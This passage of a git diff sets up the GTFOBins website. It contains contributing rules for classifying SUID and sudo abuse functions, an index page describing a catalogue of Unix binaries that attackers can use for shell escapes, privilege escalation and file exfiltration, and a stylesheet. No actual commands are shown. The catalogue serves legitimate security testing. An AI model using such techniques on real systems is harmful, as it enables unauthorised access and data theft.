Optional description of the example + code: Code of the example + - ... + ... +``` + +Where `FUNCTION` is one of the values described in the `_data/functions.yml` file. + +Feel free to use any file in the `_gtfobins/` folder as an example. + +Pull request process +-------------------- + +Vendor software is accepted as well as standard Unix binaries. Binaries and techniques that only works on certain operating systems and versions are accepted and such limitations shall be noted in the `description` field. + +Before sending a pull request of a new binary or function, ensure the following: + +1. Verify the function works on at least one type of modern Unix system. +2. Classifying SUID-related functions may be tricky because they depend on how the default shell behaves on different systems (i.e. Ubuntu vs. Debian) and how the external command is called (i.e. `exec()` family vs. `system()`). Check how the binary behaves: + - The function is considered `suid-enabled` if runs external commands with SUID privileges on Ubuntu Linux. + - The function is considered `suid-limited` if runs external commands with SUID privileges on Debian but it drops the privileges on Ubuntu Linux. +3. Verify `sudo-enabled` function runs external commands under the `sudo` privileged context. + +Pull requests adding new functions in `_data/functions.yml` are allowed and subjected to project maintainers vetting. diff --git a/functions.md b/functions.md new file mode 100644 index 0000000..44fddcd --- /dev/null +++ b/functions.md @@ -0,0 +1,8 @@ +--- +layout: page +title: Functions +--- + +A binary may support one or more of the following functions: + +{% include functions_description.html %} diff --git a/index.md b/index.md new file mode 100644 index 0000000..44ae760 --- /dev/null +++ b/index.md @@ -0,0 +1,16 @@ +--- +layout: page +title: GTFOBins +--- + +GTFOBins is a curated list of Unix binaries that can be leveraged by an attacker to bypass system security restrictions. + +This was inspired by the [LOLBins and LOLScripts](https://github.com/api0cradle/LOLBAS) project for Windows environment. + +The project collects legitimate Unix binaries that can be abused to get the f**k break out restricted shells, escalate or maintain elevated privileges, download or exfiltrate files, and facilitate the other post-exploitation tasks outlined [here](/functions/). + +GTFOBins aims to be a shared project where everyone can contribute with additional binaries and techniques. You can find detailed instructions [here](/contribute/). + +## List of GTFOBins + +{% include bin_table.html %} diff --git a/style.scss b/style.scss new file mode 100644 index 0000000..c8c1d38 --- /dev/null +++ b/style.scss @@ -0,0 +1,117 @@ +--- +--- + +$accent: #bf0707; +$lighter: #fff4f4; +$hover: #ff0000; + +// layout + +@media (min-width: 1000px) { + body { + width: 800px; + margin: 0 auto; + } +} + +// common tags + +body { + font-family: sans, sans-serif; +} + +code { + padding: 0.15em 0.25em; + border-radius: 0.25em; + color: $accent; + background: $lighter; +} + +pre { + background: $lighter; + padding: 1em; + overflow-x: auto; + + code { + padding: 0; + border-radius: 0; + } +} + +a:link, a:visited { + color: $accent; +} + +a:hover { + color: $hover; +} + +// fragment targets + +*:target { + border-left: 5px solid $accent; + padding-left: 5px; +} + +// binary list and search + +#bin-search { + padding: 0.5em; + width: 100%; + box-sizing: border-box; +} + +#bin-table { + width: 100%; + + th, td { + padding: 0.2em 1em; + } + + th { + text-align: left; + } + + #search-message { + text-align: center; + padding: 1em; + } +} + +// function description + +.function-list { + font-size: 0.8rem; + list-style: none; + padding: 0; + margin: 0; + + li { + display: inline-block; + padding: 0.25em 0.5em; + margin: 0.05em 0; + border: 1px solid $accent; + + a:link, a:visited { + color: $accent; + text-decoration: none; + } + + &:hover, a:hover { + color: $hover; + border-color: $hover; + } + } +} + +// classes + +.bin-name { + font-family: monospace; + font-size: 1.2rem; +} + +.function-name { + font-size: 1.4rem; + font-weight: bold; +}